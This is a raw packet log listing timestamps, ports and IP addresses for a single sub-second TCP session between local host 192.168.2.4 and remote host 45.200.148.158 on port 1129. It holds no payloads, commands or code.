Jan 1, 2025 18:10:00.676403046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.676414967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.676436901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.676453114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.676462889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.676487923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.913319111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.913360119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.913371086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.913398981 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.913585901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.913598061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.913611889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.913630009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.913631916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.913669109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914019108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914031029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914050102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914062977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914063931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914081097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914088964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914089918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914108992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914114952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914128065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914155006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914792061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914803028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914822102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914834023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914839983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914851904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914861917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914870977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914880037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914889097 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914905071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914917946 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.914922953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.914963007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.915767908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915780067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915800095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915816069 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.915817976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915833950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915848970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915854931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.915862083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915882111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915884972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.915895939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.915920019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.916752100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916764021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916780949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916796923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916800976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.916806936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916815996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.916825056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916838884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916843891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.916853905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916878939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.916889906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916901112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916917086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.916932106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.916954994 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.917716980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917732954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917748928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917763948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917773962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917782068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.917790890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917793989 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.917802095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917824984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.917824984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917834997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917855978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.917857885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.917959929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.918704033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918715954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918734074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918747902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918754101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.918765068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918780088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918781042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.918790102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918812037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918813944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.918823957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.918849945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.919713974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919727087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919739962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919758081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919765949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.919773102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919789076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919796944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.919800043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919811964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.919819117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919831038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919845104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.919847965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919866085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.919874907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.919902086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.920690060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920701981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920718908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920736074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920739889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.920749903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920767069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920777082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920784950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.920798063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920809031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.920811892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.920836926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.921442986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921454906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921471119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921478033 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.921484947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921495914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921505928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.921514034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921529055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921535015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.921541929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921559095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.921561003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921575069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921588898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921597958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.921606064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921614885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.921628952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.921657085 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922331095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922346115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922363043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922384024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922552109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922626019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922703028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922714949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922734022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922753096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922768116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922776937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922782898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922796965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922800064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922816038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922822952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922836065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922847033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922854900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922863007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.922888994 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.922905922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.923681021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923691988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923707962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923718929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923733950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.923736095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923748016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923760891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923763037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.923775911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923778057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.923795938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923808098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923810005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.923823118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923837900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923847914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.923856974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.923883915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.924647093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924659967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924670935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924686909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924693108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.924699068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924715042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924719095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.924727917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924738884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924743891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.924762011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924767971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.924773932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924789906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924798012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924806118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.924815893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.924838066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.924848080 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.925642967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925654888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925671101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925683022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925689936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.925700903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925717115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925729036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925729990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.925745010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925751925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.925760984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925775051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925777912 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.925787926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925802946 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.925812960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.925837994 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.926542044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.926554918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.926569939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.926585913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.926599026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.926599979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.926610947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.926620007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.926657915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.927107096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927119970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927138090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927151918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927164078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927166939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.927184105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927191973 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.927196980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927216053 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.927216053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927225113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927242041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927251101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.927254915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927268028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927279949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.927288055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927299976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.927301884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.927346945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.928051949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928064108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928080082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928096056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928103924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.928107023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928123951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928133011 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.928138971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928153038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928165913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.928169012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928184032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928185940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.928200006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928212881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928241968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.928261995 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.928975105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.928986073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929001093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929014921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929025888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929028988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929045916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929050922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929055929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929074049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929084063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929092884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929105997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929120064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929121971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929136992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929141045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929147005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929193020 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929874897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929892063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929913998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929919004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929929972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929941893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929958105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929969072 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929974079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.929989100 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.929992914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930006981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930022955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930027008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.930037022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930047035 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.930054903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930095911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.930716038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930732965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930747032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930764914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930774927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.930774927 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.930793047 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.930824041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.931015015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931026936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931063890 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.931138992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931152105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931169033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931184053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931190968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:00.931200027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:00.931217909 CET	1129	49730	45.200.148.158	192.168.2.4
